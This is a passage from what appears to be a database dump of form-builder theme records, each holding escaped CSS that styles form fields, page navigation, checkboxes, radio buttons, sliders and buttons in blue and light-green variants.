0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(33,'Theme 09 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #015875;\r\nmargin-bottom: 10px;\r\ncolor: #015875;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #015875 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	 background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #015875;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #015875;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #015875;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #80ABBA !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #DEE9EC;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #5C90A2;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/03/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(34,'Theme 09 transparent (lightgreen button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #30D1B1;\r\nmargin-bottom: 10px;\r\ncolor: #30D1B1;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 